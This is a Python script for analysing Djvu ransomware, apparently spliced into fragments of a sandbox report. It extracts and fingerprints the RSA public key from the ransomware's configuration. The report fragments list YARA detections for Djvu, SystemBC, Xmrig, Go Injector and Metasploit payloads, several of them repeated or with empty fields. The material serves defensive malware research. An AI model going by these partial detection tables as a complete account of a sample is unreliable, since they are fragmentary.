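"""Recover modulus size, public exponent and a SHA-256 fingerprint from the
"Public Key" field of the Djvu configuration.  Added example; stdlib only."""
import base64
import hashlib
import re

# Value copied from the Djvu configuration block as the report prints it,
# i.e. still JSON-escaped ("\\\\n" for newline, "\\/" for "/").
REPORT_PUBLIC_KEY = (
    r"-----BEGIN PUBLIC KEY-----\\\\n"
    r"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\n"
    r"sRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\n"
    r"tDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\n"
    r"SXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n"
    r"0DxDnHDefnxaf\/3VSRczBwGZlq\/Mr2bfHM2Mf8JWmYztlmGbjGb\/\/oixuuRePxzt\\\\n"
    r"6xgozgVrC64HnagNFyODdlk2w\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\n"
    r"fwIDAQAB\\\\n-----END PUBLIC KEY-----"
)

RSA_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1 rsaEncryption


def pem_body_to_der(escaped_pem):
    """Undo the report's JSON escaping and the PEM framing; return raw DER bytes."""
    text = re.sub(r"\\+/", "/", escaped_pem)           # "\/" (any depth) -> "/"
    text = re.sub(r"\\+n", "\n", text)                 # "\\n" (any depth) -> newline
    text = re.sub(r"-----(BEGIN|END) PUBLIC KEY-----", "", text)
    body = re.sub(r"[^A-Za-z0-9+/=]", "", text)        # keep only base64 characters
    return base64.b64decode(body)


def der_read(buf, pos=0):
    """Read one DER TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long form: next n bytes are the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def rsa_public_numbers(der):
    """Walk SubjectPublicKeyInfo -> RSAPublicKey; return (modulus, exponent)."""
    tag, spki, _ = der_read(der)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    _, alg, pos = der_read(spki)                       # AlgorithmIdentifier
    _, oid, _ = der_read(alg)
    if oid != RSA_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = der_read(spki, pos)                 # BIT STRING
    if tag != 0x03:
        raise ValueError("subjectPublicKey must be a BIT STRING")
    _, rsa, _ = der_read(bits[1:])                     # skip unused-bits byte -> RSAPublicKey
    _, n_bytes, pos = der_read(rsa)
    _, e_bytes, _ = der_read(rsa, pos)
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def describe_key(escaped_pem=REPORT_PUBLIC_KEY):
    """Summary suitable for comparing this key against other samples' configs."""
    der = pem_body_to_der(escaped_pem)
    n, e = rsa_public_numbers(der)
    return {
        "der_len": len(der),
        "modulus_bits": n.bit_length(),
        "exponent": e,
        "spki_sha256": hashlib.sha256(der).hexdigest(),
    }


if __name__ == "__main__":
    for k, v in describe_key().items():
        print(f"{k}: {v}")
```

The SPKI hash is the value to store: two configs that share it share the RSA key, which for this family is the key that protects the per-file key material and therefore the question any decryptor has to answer first.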
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security | ||
JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security | ||
Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth |
JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security | ||
Change of critical system settings |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Kiran kumar s, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |